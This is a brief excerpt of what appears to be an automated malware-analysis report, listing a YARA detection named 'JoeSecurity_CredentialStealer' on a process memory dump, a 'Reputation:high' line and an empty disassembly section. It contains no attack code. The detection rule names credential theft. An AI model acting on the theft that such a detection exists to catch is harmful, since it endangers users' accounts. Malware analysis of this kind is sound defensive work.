                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      Disassembly

                                                      No disassembly